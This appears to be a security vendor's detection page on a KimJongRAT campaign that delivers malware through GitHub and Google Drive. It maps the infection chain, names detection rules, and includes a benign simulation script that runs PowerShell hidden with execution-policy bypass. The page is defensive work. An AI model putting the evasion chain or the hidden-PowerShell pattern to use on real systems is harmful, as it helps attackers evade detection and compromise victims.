KimJongRAT Continues to Evolve Through Living Off Trusted Sites
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A recent KimJongRAT campaign has been observed using GitHub Releases and Google Drive as trusted platforms to host and deliver malware. This updated variant blends InfoStealer and RAT functionality while relying on Living Off Trusted Sites (LOTS) techniques to lower the chance of detection. It has also evolved to retrieve command-and-control addresses dynamically from Google Drive, reducing the need for repeated recompilation.
Investigation
The investigation reviewed a May 2026 campaign in which victims were redirected through shortened links to GitHub-hosted ZIP archives containing malicious LNK files. Researchers mapped the execution chain, including abuse of mshta.exe, VBScript, and PowerShell to launch multi-stage payloads. The analysis also uncovered a new capability involving deployment of MeshAgent for long-term remote access.
Mitigation
Organizations should enforce strict controls over execution of LNK files and mshta.exe when sourced from untrusted locations. Monitoring for suspicious PowerShell behavior, including Base64-encoded commands and downloads from cloud services such as Google Drive and GitHub, is essential. Restricting unauthorized remote management tools such as MeshAgent can further limit the impact of compromise.
Response
If this activity is detected, isolate affected hosts immediately to prevent lateral movement and data exfiltration. Conduct memory forensics to identify any active malicious DLLs or PowerShell components. Review Google Drive and GitHub access logs for unusual activity tied to the identified infrastructure, and update endpoint detections with the extracted indicators of compromise.
"flowchart TD step_initial_access["T1566.001 & T1566.002 u2013 Phishing: Spearphishing Attachment/Link: Lured via shortened URLs to download tax_edoc.zip from GitHub"] step_user_execution["T1204.002 u2013 User Execution: Malicious File: Victim opens a malicious LNK file from the extracted ZIP"] rules_for_user_execution("<b>Rule Name</b>: Execution from ZIP Archive [7zip] (via process_creation)<br/><b>Rule ID</b>: 43917da8-4e9a-4cd2-b3f9-dc60e2326534") step_proxy_execution["T1218.005 u2013 System Binary Proxy Execution: Mshta: Uses Mshta to download and execute pdfko.zip from GitHub"] step_script_execution["T1218.001 & T1216.002 u2013 System Binary/Script Proxy Execution: Obfuscated VBScript in HTA uses Compiled HTML File and SyncAppvPublishingServer"] step_decoy_steganography["T1027.003 u2013 Obfuscated Files or Information: Steganography: Downloads a decoy document to distract the user"] step_branching{"Environment Check: Determines if Windows Defender is active"} step_defender_inactive["T1027 & T1218.011 u2013 Obfuscated Files & Rundll32: Downloads encrypted user.txt/sys.log via AES/RC4 and executes sys.dll"] step_defender_active["T1027.006 u2013 Obfuscated Files or Information: HTML Smuggling: Executes PowerShell 1.ps1 to decode KimJongRAT"] step_persistence_c2["T1219 & T1568 & T1578 u2013 Persistence & C2: Installs MeshAgent and uses Dynamic Resolution via Google Drive to update C2 addresses"] step_initial_access –>|leads_to| step_user_execution step_user_execution –>|leads_to| step_proxy_execution step_user_execution -.->|detected_by| rules_for_user_execution step_proxy_execution –>|leads_to| step_script_execution step_script_execution –>|leads_to| step_decoy_steganography step_decoy_steganography –>|leads_to| step_branching step_branching –>|if_inactive| step_defender_inactive step_branching –>|if_active| step_defender_active step_defender_inactive –>|leads_to| step_persistence_c2 step_defender_active –>|leads_to| step_persistence_c2 "
Attack Flow
Detections
Possible Google Drive Phishing (via proxy)
View
Suspicious CURL Usage (via cmdline)
View
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
View
Suspicious Powershell Strings (via cmdline)
View
Suspicious Powershell Strings (via powershell)
View
Suspicious Extracted Files from an Archive (via file_event)
View
Execution from ZIP Archive [7zip] (via process_creation)
View
KimJongRAT Malicious Download and C2 Communication Detection [Windows Network Connection]
View
Detect KimJongRAT PowerShell Execution [Windows PowerShell]
View
KimJongRAT Execution Using mshta and Command-Line Checks [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary has successfully gained a foothold and is attempting to execute the KimJongRAT payload. To evade simple signature-based detection, the malware is designed to run a PowerShell script in a hidden window, bypassing the execution policy, and passing a specific log filename as a parameter to handle its encrypted configuration. The goal is to establish a persistent, stealthy remote access trojan (RAT) on the victim machine. We will execute the exact command pattern identified in the detection rule to validate the “selection_execute” logic.
-
Regression Test Script:
# Simulation of KimJongRAT execution pattern # This creates a dummy script to satisfy the '-File' requirement "Write-Output 'Simulating KimJongRAT Payload'" | Out-File -FilePath "1.ps1" -Encoding ascii # Executing the command that triggers the detection rule # Note: This is run in a way that mimics the command line arguments exactly. Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log" -WindowStyle Hidden -
Cleanup Commands:
# Remove the dummy files created during simulation Remove-Item -Path "1.ps1" -ErrorAction SilentlyContinue Remove-Item -Path "1.log" -ErrorAction SilentlyContinue